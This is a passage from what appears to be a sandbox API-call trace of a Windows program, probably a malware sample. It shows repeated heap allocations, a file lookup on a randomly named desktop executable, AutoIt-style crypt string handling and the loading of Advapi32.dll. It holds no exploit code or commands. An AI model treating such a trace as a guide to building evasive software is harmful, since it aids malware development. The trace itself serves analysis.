Flags=0x0, Size=0x10) returned 0x2e538d8 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0189.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0189.818] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0189.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0189.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0189.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0189.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0189.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0189.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0189.819] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0189.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0189.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0189.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0189.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0189.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0189.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0189.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0189.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0189.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0189.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0189.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0189.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0189.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.822] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/O4GkFtfMO8YRUkhr.exe", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3827380, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xa3827380, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0x84361700, ftLastWriteTime.dwHighDateTime=0x1d67c7a, nFileSizeHigh=0x0, nFileSizeLow=0x44b640, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="O4GkFtfMO8YRUkhr.exe", cAlternateFileName="O4GKFT~1.EXE")) returned 0xa87510 [0189.822] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0189.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0189.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0189.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0189.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0189.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0189.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0189.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0189.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0189.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0189.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0189.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0189.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0189.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0189.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0189.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0189.823] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0189.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.823] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0189.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0189.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0189.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0189.824] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0189.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0189.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0189.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0189.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0189.824] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0189.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0189.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0189.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0189.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0189.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0189.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0189.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0189.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0189.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.825] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0189.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0189.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0189.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0189.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0189.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.836] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0189.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0189.858] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0189.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0189.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0189.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0189.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0189.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0189.858] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0189.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.859] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) 